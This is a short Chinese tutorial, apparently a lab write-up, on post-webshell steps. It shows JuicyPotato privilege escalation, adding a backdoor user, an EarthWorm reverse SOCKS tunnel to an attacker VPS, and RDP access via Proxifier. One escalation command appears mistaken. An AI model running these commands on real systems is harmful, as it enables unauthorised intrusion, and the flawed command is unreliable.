很多小伙伴在拿下一台机器,尤其对于我这种菜鸟来说,连接一句话木马后,就不知道怎样进行下一步操作了,所以,这次这里拿靶机尝试做了一个内网的端口映射
拿到机器时候发现为普通用户权限
拿到机器时候whoami之后为普通用户权限的情况下,上传jucypotato尝试添加用户提权
net user 用户 用户密码 /add
jucypotato.exe -p “net user administrators 被添加的用户”
尝试远程连接后各种操作均失败
利用公网IP进行端口监听
首先我们需要一个vps对端口进行监听,映射端口和监听端口要设置好,且不被占用哦
根据系统版本进行一个工具的匹配上传earthworm
设置好监听后,向目标机器上传相应版本的earthworm工具(本次为win_32.exe)
建立反向代理:
win_32.exe -s rssocks -d 129.211.x.x (监听公网ip) -e 8888(映射端口=目标机器访问的端口)
设置成功后,公网监听的端口可返回状态
使用proxifer代理
使用socks做好配置
访问目标IP
使用之前创建的管理员用户远程登录桌面
接下来可直接使用创建的管理员用户远程登录桌面
之后就可以在内网进行别的操作啦,此次全程使用个人服务器靶机,好奇的伙伴可以尝试搭建靶机复现啦